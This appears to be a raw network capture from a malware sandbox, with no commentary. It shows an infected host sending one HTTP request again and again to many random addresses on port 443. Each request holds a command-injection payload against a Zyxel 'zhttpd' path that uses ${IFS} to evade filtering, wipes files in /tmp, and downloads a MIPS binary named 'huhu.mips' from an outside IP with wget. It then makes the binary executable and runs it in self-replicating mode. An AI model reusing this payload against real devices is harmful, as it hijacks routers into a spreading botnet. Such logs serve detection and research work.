                                                Jan 29, 2024 07:08:04.681855917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8509192.168.2.2352646117.244.242.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.681884050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8510192.168.2.2340318198.194.118.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.681926966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8511192.168.2.2347802219.220.227.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.681977987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8512192.168.2.233603890.123.253.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.681997061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8513192.168.2.23506441.236.170.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.682048082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8514192.168.2.233476234.78.151.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.682069063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8515192.168.2.233692095.27.176.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.682127953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8516192.168.2.2348234181.20.250.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.682152033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8517192.168.2.2344376122.140.106.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.682209969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8518192.168.2.235571896.113.222.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.682236910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8519192.168.2.23444921.104.50.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.682277918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8520192.168.2.233389834.140.157.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.682322025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8521192.168.2.2359916181.6.228.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.682356119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8522192.168.2.234502648.95.82.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.682406902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8523192.168.2.234810634.177.101.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.682450056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8524192.168.2.2345596132.71.38.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.682495117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8525192.168.2.233353254.211.255.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.682539940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8526192.168.2.2333374112.56.11.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.682565928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8527192.168.2.2339996206.120.94.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.682606936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8528192.168.2.23568864.39.16.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.682629108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8529192.168.2.234014675.185.70.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.682688951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8530192.168.2.2348726182.134.230.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.682724953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8531192.168.2.236048069.189.36.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.682754040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8532192.168.2.2333016111.29.100.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.682823896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8533192.168.2.2357586159.216.90.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.682848930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8534192.168.2.234427477.17.133.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.682908058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8535192.168.2.234962675.98.99.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.682938099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8536192.168.2.2357506149.20.5.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.682981014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8537192.168.2.2341326151.245.140.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.683001041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8538192.168.2.2336524133.23.223.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.683063030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8539192.168.2.2355184126.92.122.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.683111906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8540192.168.2.2335162172.243.62.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.683160067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8541192.168.2.2343998218.211.105.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.683207989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8542192.168.2.2353554168.134.34.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.683243990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8543192.168.2.233487419.68.37.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.683274031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8544192.168.2.234168696.23.215.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.683309078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8545192.168.2.234914690.35.84.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.683341026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8546192.168.2.2342540213.167.61.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.683393002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8547192.168.2.2352864121.87.73.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.683429956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8548192.168.2.2357050206.108.249.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.683479071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8549192.168.2.235853619.27.147.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.683515072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8550192.168.2.2336102152.167.111.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.683568954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8551192.168.2.233959418.56.243.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.683592081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8552192.168.2.234092079.186.55.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.683626890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8553192.168.2.2357718183.119.193.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.683665037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8554192.168.2.235462093.69.29.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.683701038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8555192.168.2.233592446.194.187.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.683717966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8556192.168.2.235889039.157.243.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.683778048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8557192.168.2.2355270122.5.108.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.683819056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8558192.168.2.2352204194.139.184.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.683852911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8559192.168.2.2351062110.67.30.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.683880091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8560192.168.2.2352678112.144.69.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.683914900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8561192.168.2.235955667.194.88.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.683974028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8562192.168.2.2340646176.114.45.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.684030056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8563192.168.2.2349958185.150.171.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.684066057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8564192.168.2.2341648158.106.92.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.684089899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8565192.168.2.2345962142.159.52.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.684117079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8566192.168.2.2343982202.108.99.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.684164047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8567192.168.2.233613093.151.224.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.684211016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8568192.168.2.234690640.58.243.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.684236050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8569192.168.2.2333016187.209.154.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.687809944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8570192.168.2.2333150118.50.222.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.687829018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8571192.168.2.234304237.187.239.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.687861919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8572192.168.2.2344090172.158.46.215443
                                                TimestampBytes transferredDirectionData
